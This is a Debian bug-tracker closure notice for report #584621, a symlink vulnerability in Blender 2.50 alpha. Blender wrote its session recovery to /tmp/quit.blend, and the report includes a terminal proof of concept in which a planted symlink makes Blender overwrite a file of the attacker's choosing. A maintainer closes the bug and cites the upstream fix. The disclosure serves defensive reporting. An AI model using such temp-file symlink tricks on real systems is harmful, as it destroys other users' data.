Your message dated Tue, 5 Aug 2014 16:02:29 +0200
with message-id <20140805140229.ga5...@nx6125.studiovescovi.eu>
and subject line Re: blender: possible symlink attack
has caused the Debian Bug report #584621,
regarding blender: possible symlink attack
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
584621: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584621
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: blender
Version: 2.50~alpha~0~svn24834-2
Severity: normal
Tags: security
Forwarded:
https://projects.blender.org/tracker/index.php?func=detail&aid=22509&group_id=9&atid=498
Blender is subject to symlink attack when the user closes the app
without saving their changes. The consequences are that an attacker
determined file owned by the victim is overwritten with a .blend file,
destroying whatever data was in the file in the process.
Version 2.49.2~dfsg-2 isn't vulnerable to this attack since it uses
~/.blender/quit.blend instead of /tmp/quit.blend. I would suggest this
behaviour be restored before Blender 2.50 is released.
pabs@chianamo:~$ sudo ln -s /home/pabs/foo /tmp/quit.blend
[sudo] password for pabs:
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
ls: cannot access /home/pabs/foo: No such file or directory
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/fooo: ERROR: cannot open `/home/pabs/foo' (No such file or directory)
pabs@chianamo:~$ blender
Ob 'Camera' - Successfully removed 0 keyframes
*bpy stats* - tot exec: 5728, tot run: 0.4375sec, average run: 0.000076sec,
tot usage 1.4299%
Saved session recovery to /tmp/quit.blend
Blender quit
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 78K Jun 5 13:53 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: Blender3D, saved as 64-bits little endian with version
2.50.0007
pabs@chianamo:~$ echo foo > /home/pabs/foo
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 4 Jun 5 14:00 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: ASCII text
pabs@chianamo:~$ blender
*bpy stats* - tot exec: 648, tot run: 0.0677sec, average run: 0.000104sec,
tot usage 0.4556%
Saved session recovery to /tmp/quit.blend
Blender quit
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: Blender3D, saved as 64-bits little endian with version
2.50.0007
--
bye,
pabs
http://wiki.debian.org/PaulWise
signature.asc
Description: This is a digitally signed message part
--- End Message ---
--- Begin Message ---
Package: blender
Version: 2.71+dfsg0-1
Followup-For: Bug #584621
Today I've contacted upstream developers (via IRC channel on Freenode)
and asked about this long-lasting security bug.
They pointed me to:
https://developer.blender.org/rB367722470aa2eada43614cd558f468b4beea851d
where it's clear that the issue has been fixed with that commit.
So, I'm (finally) closing this bug report.
Cheers.
--
Matteo F. Vescovi | Debian Maintainer
GnuPG KeyID: 4096R/0x8062398983B2CF7A
signature.asc
Description: Digital signature
--- End Message ---
_______________________________________________
pkg-multimedia-maintainers mailing list
pkg-multimedia-maintainers@lists.alioth.debian.org
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-multimedia-maintainers
